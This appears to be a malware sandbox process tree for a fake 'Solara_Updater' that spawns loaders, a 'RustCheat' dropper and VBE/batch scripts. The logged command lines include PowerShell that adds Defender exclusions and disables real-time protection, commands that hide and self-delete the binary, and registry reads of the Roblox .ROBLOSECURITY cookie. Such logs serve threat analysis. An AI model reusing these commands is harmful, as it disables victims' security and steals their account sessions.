        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        14⤵
        Checks computer location settings
        
        PID:3660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        15⤵
        
        PID:4712
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        16⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        13⤵
        Checks computer location settings
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        14⤵
        Executes dropped EXE
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        14⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4300
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        15⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        16⤵
        
        PID:4520
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        17⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        14⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:468
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        16⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        17⤵
        
        PID:4780
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        18⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        15⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        16⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3008
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        17⤵
        Checks computer location settings
        
        PID:2812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        18⤵
        
        PID:2888
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        19⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        16⤵
        Checks computer location settings
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:644
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        18⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        19⤵
        
        PID:1388
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        20⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        17⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        18⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2472
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        19⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        20⤵
        
        PID:4636
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        21⤵
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        18⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        19⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:756
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        20⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        21⤵
        
        PID:4456
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        22⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        19⤵
        Checks computer location settings
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        20⤵
        Executes dropped EXE
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1144
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        21⤵
        Checks computer location settings
        
        PID:1004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        22⤵
        
        PID:4020
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        23⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        20⤵
        Checks computer location settings
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        22⤵
        Executes dropped EXE
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        22⤵
        Executes dropped EXE
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        21⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2600
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        22⤵
        Checks computer location settings
        
        PID:2492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        23⤵
        
        PID:3876
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        24⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        21⤵
        Checks computer location settings
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        22⤵
        Executes dropped EXE
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        23⤵
        Executes dropped EXE
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        23⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:1652
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        24⤵
        Views/modifies file attributes
        
        PID:64
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        
        PID:880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:2620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:1404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:5028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:1124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        
        PID:4492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:3548
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        24⤵
        
        PID:4216
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        Runs ping.exe
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        22⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4024
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        23⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        24⤵
        
        PID:3852
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        25⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        22⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        24⤵
        
        PID:540
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        24⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        23⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        24⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        25⤵
        
        PID:1656
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        26⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        23⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        24⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        24⤵
        Modifies registry class
        
        PID:2284
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        25⤵
        Checks computer location settings
        
        PID:4968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        26⤵
        
        PID:756
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        27⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        24⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        25⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        25⤵
        Modifies registry class
        
        PID:1872
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        26⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        27⤵
        
        PID:1332
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        28⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        25⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        26⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        26⤵
        Modifies registry class
        
        PID:1196
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        27⤵
        Checks computer location settings
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        28⤵
        
        PID:2812
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        29⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        26⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        27⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        27⤵
        Modifies registry class
        
        PID:3084
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        28⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        29⤵
        
        PID:4552
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        30⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        27⤵
        Checks computer location settings
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        28⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        28⤵
        Modifies registry class
        
        PID:4500
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        29⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        30⤵
        
        PID:3388
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        31⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        28⤵
        Checks computer location settings
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        29⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        29⤵
        Modifies registry class
        
        PID:4576
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        30⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        31⤵
        
        PID:5060
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        32⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        29⤵
        Checks computer location settings
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        30⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        30⤵
        Modifies registry class
        
        PID:3020
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        31⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        32⤵
        
        PID:3792
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        33⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        30⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        31⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        31⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4496
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        32⤵
        Checks computer location settings
        
        PID:1416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        33⤵
        
        PID:4496
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        34⤵
        
        PID:752
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        31⤵
        Checks computer location settings
        
        PID:1012
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        32⤵
        
        PID:432
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        33⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        33⤵
        Drops file in Drivers directory
        
        PID:2284
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:4340
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        34⤵
        Views/modifies file attributes
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        34⤵
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:3444
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        34⤵
        
        PID:3548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        34⤵
        
        PID:2748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        34⤵
        
        PID:3968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        34⤵
        Detects videocard installed
        
        PID:2776
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        34⤵
        
        PID:1312
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        35⤵
        Runs ping.exe
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        32⤵
        Modifies registry class
        
        PID:1344
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        33⤵
        Checks computer location settings
        
        PID:3136
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        34⤵
        
        PID:2296
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        35⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        32⤵
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        33⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        33⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3456
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        34⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        35⤵
        
        PID:3320
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        36⤵
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        33⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        34⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        34⤵
        Modifies registry class
        
        PID:2120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        35⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\cmd.exe
        
